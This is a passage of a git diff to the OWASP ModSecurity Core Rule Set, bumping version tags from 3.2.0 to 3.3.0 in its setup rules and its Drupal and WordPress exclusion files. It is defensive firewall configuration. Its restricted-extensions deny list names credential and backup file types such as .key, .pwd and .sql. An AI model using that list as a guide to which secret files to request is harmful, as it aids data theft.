 setvar:'tx.error_anomaly_score=4'"
 SecRule &TX:warning_anomaly_score "@eq 0" \
@@ -137,7 +137,7 @@ SecRule &TX:warning_anomaly_score "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.warning_anomaly_score=3'"
 SecRule &TX:notice_anomaly_score "@eq 0" \
@@ -145,7 +145,7 @@ SecRule &TX:notice_anomaly_score "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.notice_anomaly_score=2'"
 # Default do_reput_block
@@ -154,7 +154,7 @@ SecRule &TX:do_reput_block "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.do_reput_block=0'"
 # Default block duration
@@ -163,7 +163,7 @@ SecRule &TX:reput_block_duration "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.reput_block_duration=300'"
 # Default HTTP policy: allowed_methods (rule 900200)
@@ -172,7 +172,7 @@ SecRule &TX:allowed_methods "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
 # Default HTTP policy: allowed_request_content_type (rule 900220)
@@ -181,7 +181,7 @@ SecRule &TX:allowed_request_content_type "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json| |application/octet-stream| |application/csp-report| |application/xss-auditor-report| |text/plain|'"
 # Default HTTP policy: allowed_request_content_type_charset (rule 900270)
@@ -190,7 +190,7 @@ SecRule &TX:allowed_request_content_type_charset "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'"
 # Default HTTP policy: allowed_http_versions (rule 900230)
@@ -199,7 +199,7 @@ SecRule &TX:allowed_http_versions "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'"
 # Default HTTP policy: restricted_extensions (rule 900240)
@@ -208,7 +208,7 @@ SecRule &TX:restricted_extensions "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"
 # Default HTTP policy: restricted_headers (rule 900250)
@@ -217,7 +217,7 @@ SecRule &TX:restricted_headers "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.restricted_headers=/proxy/ /lock-token/ /content-range/ /if/'"
 # Default HTTP policy: static_extensions (rule 900260)
@@ -226,7 +226,7 @@ SecRule &TX:static_extensions "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" # Default enforcing of body processor URLENCODED @@ -235,7 +235,7 @@ SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.enforce_bodyproc_urlencoded=0'" # @@ -253,7 +253,7 @@ SecAction \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.anomaly_score=0',\ setvar:'tx.anomaly_score_pl1=0',\ setvar:'tx.anomaly_score_pl2=0',\ @@ -290,7 +290,7 @@ SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \ pass,\ t:none,t:sha1,t:hexEncode,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.ua_hash=%{MATCHED_VAR}'" SecAction \ @@ -299,7 +299,7 @@ SecAction \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ initcol:global=global,\ initcol:ip=%{remote_addr}_%{tx.ua_hash},\ setvar:'tx.real_ip=%{remote_addr}'" @@ -320,7 +320,7 @@ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ msg:'Enabling body inspection',\ tag:'paranoia-level/1',\ ctl:forceRequestBodyVariable=On,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Force body processor URLENCODED SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ @@ -331,7 +331,7 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ nolog,\ noauditlog,\ msg:'Enabling forced body inspection for ASCII content',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ "ctl:requestBodyProcessor=URLENCODED" @@ -370,7 +370,7 @@ SecRule TX:sampling_percentage "@eq 100" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-SAMPLING" SecRule UNIQUE_ID "@rx ^." \ 
@@ -379,7 +379,7 @@ SecRule UNIQUE_ID "@rx ^." \ pass,\ t:sha1,t:hexEncode,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'TX.sampling_rnd100=%{MATCHED_VAR}'" SecRule DURATION "@rx (..)$" \ @@ -388,7 +388,7 @@ SecRule DURATION "@rx (..)$" \ pass,\ capture,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'TX.sampling_rnd100=%{TX.sampling_rnd100}%{TX.1}'" SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ @@ -397,7 +397,7 @@ SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ pass,\ capture,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'" SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \ @@ -406,7 +406,7 @@ SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \ pass,\ capture,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'TX.sampling_rnd100=%{TX.1}'" @@ -429,10 +429,9 @@ SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ pass,\ log,\ noauditlog,\ - msg:'Sampling: Disable the rule engine based on sampling_percentage \ -%{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ + msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ ctl:ruleEngine=Off,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecMarker "END-SAMPLING" @@ -450,4 +449,4 @@ SecRule TX:executing_paranoia_level "@lt %{tx.paranoia_level}" \ t:none,\ log,\ msg:'Executing paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" diff --git a/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf b/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf index 8e5c8c58f..2b6b1a77e 100644 --- a/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf 
@@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -68,7 +68,7 @@ SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DRUPAL-RULE-EXCLUSIONS" @@ -106,7 +106,7 @@ SecAction "id:9001100,\ nolog,\ ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES_NAMES,\ ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -121,7 +121,7 @@ SecRule REQUEST_FILENAME "@endsWith /core/install.php" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass2],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /user/login" \ "id:9001112,\ @@ -130,7 +130,7 @@ SecRule REQUEST_FILENAME "@endsWith /user/login" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \ "id:9001114,\ @@ -139,7 +139,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \ "id:9001116,\ 
@@ -149,7 +149,7 @@ SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:current_pass,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -169,7 +169,7 @@ SecRule REQUEST_FILENAME "@contains /admin/config/" \ pass,\ nolog,\ ctl:ruleRemoveById=942430,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \ "id:9001124,\ @@ -186,7 +186,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_activated_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_blocked_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_canceled_body,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/single/import" \ "id:9001126,\ @@ -195,7 +195,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/sing nolog,\ ctl:ruleRemoveById=920271,\ ctl:ruleRemoveById=942440,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ "id:9001128,\ @@ -203,7 +203,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ pass,\ nolog,\ ctl:ruleRemoveById=942440,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -220,7 +220,7 @@ SecRule REQUEST_FILENAME "@endsWith /contextual/render" \ pass,\ nolog,\ ctl:ruleRemoveTargetById=942130;ARGS:ids[],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -239,7 +239,7 @@ SecAction "id:9001160,\ ctl:ruleRemoveTargetById=942440;ARGS:form_build_id,\ ctl:ruleRemoveTargetById=942450;ARGS:form_token,\ ctl:ruleRemoveTargetById=942450;ARGS:form_build_id,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # 
@@ -256,7 +256,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/content/formats/manage/full_ht nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:editor[settings][toolbar][button_groups],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filters[filter_html][settings][allowed_html],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -274,7 +274,7 @@ SecRule REQUEST_METHOD "@streq POST" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@rx /admin/content/assets/add/[a-z]+$" \ "chain" @@ -288,7 +288,7 @@ SecRule REQUEST_METHOD "@streq POST" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@rx /admin/content/assets/manage/[0-9]+$" \ "chain" @@ -306,7 +306,7 @@ SecRule REQUEST_METHOD "@streq POST" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@rx /file/ajax/field_asset_[a-z0-9_]+/[ua]nd/0/form-[a-z0-9A-Z_-]+$" \ "chain" @@ -334,7 +334,7 @@ SecRule REQUEST_FILENAME "@endsWith /node/add/article" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /node/add/page" \ "id:9001202,\ @@ -343,7 +343,7 @@ SecRule REQUEST_FILENAME "@endsWith /node/add/page" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \ "id:9001204,\ 
@@ -353,7 +353,7 @@ SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ ctl:ruleRemoveTargetById=932110;ARGS:destination,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /block/add" \ "id:9001206,\ @@ -361,7 +361,7 @@ SecRule REQUEST_FILENAME "@endsWith /block/add" \ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/basic" \ "id:9001208,\ @@ -369,7 +369,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:description,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \ "id:9001210,\ @@ -377,7 +377,7 @@ SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:value,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \ "id:9001212,\ @@ -385,7 +385,7 @@ SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message[0][value],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ "id:9001214,\ @@ -393,7 +393,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:maintenance_mode_message,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \ "id:9001216,\ 
@@ -401,7 +401,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feed_description,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecMarker "END-DRUPAL-RULE-EXCLUSIONS" diff --git a/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf b/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf index 487eef01d..4384266a7 100644 --- a/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -22,7 +22,7 @@ SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-WORDPRESS" SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ @@ -31,7 +31,7 @@ SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-WORDPRESS" @@ -52,7 +52,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Reset password SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ @@ -61,7 +61,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq resetpass" \ "t:none,\ 
@@ -85,7 +85,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-comments-post.php" \ t:none,\ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -102,7 +102,7 @@ SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/(?:posts|pages)" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Gutenberg via rest_route for sites without pretty permalinks SecRule REQUEST_FILENAME "@endsWith /index.php" \ @@ -111,7 +111,7 @@ SecRule REQUEST_FILENAME "@endsWith /index.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule &ARGS:rest_route "@eq 1" \ "t:none,\ @@ -140,7 +140,7 @@ SecRule ARGS:wp_customize "@streq on" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule &ARGS:action "@eq 0" \ "t:none,\ @@ -161,7 +161,7 @@ SecRule ARGS:wp_customize "@streq on" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@rx ^(?:|customize_save|update-widget)$" \ "t:none,\ @@ -202,7 +202,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-cron.php" \ nolog,\ ctl:ruleRemoveById=920180,\ ctl:ruleRemoveById=920300,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -217,7 +217,7 @@ SecRule REQUEST_COOKIES:_wp_session "@rx ^[0-9a-f]+\|\|\d+\|\|\d+$" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule &REQUEST_COOKIES:_wp_session "@eq 1" \ "t:none,\ @@ -236,7 +236,7 @@ SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-WORDPRESS-ADMIN" SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ @@ -245,7 +245,7 @@ SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-WORDPRESS-ADMIN" 
@@ -260,7 +260,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/setup-config.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:step "@streq 2" \ "t:none,\ @@ -276,7 +276,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/install.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:step "@streq 2" \ "t:none,\ @@ -299,7 +299,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/profile.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ @@ -327,7 +327,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-edit.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ @@ -356,7 +356,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-new.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq createuser" \ "t:none,\ @@ -397,7 +397,7 @@ SecAction \ ctl:ruleRemoveTargetById=942200;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=942260;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=942431;ARGS:wp_http_referer,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # # [ Content editing ] @@ -414,7 +414,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/post.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@rx ^(?:edit|editpost)$" \ "t:none,\ @@ -434,7 +434,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq heartbeat" \ "t:none,\ @@ -456,7 +456,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/nav-menus.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ 
@@ -481,7 +481,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@rx ^(?:save-widget|update-widget)$" \ "t:none,\ @@ -536,7 +536,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq widgets-order" \ "t:none,\ @@ -565,7 +565,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq sample-permalink" \ "t:none,\ @@ -581,7 +581,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq add-menu-item" \ "t:none,\ @@ -597,7 +597,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq send-attachment-to-editor" \ "t:none,\ @@ -618,7 +618,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:option_page "@streq general" \ "t:none,\ @@ -649,7 +649,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/options-permalink.php" \ ctl:ruleRemoveTargetById=920272;ARGS:permalink_structure,\ ctl:ruleRemoveTargetById=942431;ARGS:permalink_structure,\ ctl:ruleRemoveTargetById=920272;REQUEST_BODY,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Comments blacklist and moderation list SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ @@ -658,7 +658,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:option_page "@streq discussion" \ "t:none,\ 
@@ -682,7 +682,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/edit.php" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:s,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -721,7 +721,7 @@ SecRule REQUEST_FILENAME "@rx /wp-admin/load-(?:scripts|styles)\.php$" \ ctl:ruleRemoveTargetById=942430;ARGS:load[],\ ctl:ruleRemoveTargetById=942431;ARGS:load[],\ ctl:ruleRemoveTargetById=942432;ARGS:load[],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecMarker "END-WORDPRESS-ADMIN" diff --git a/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf b/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf index 7bca415f3..340d98a9b 100644 --- a/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf @@ 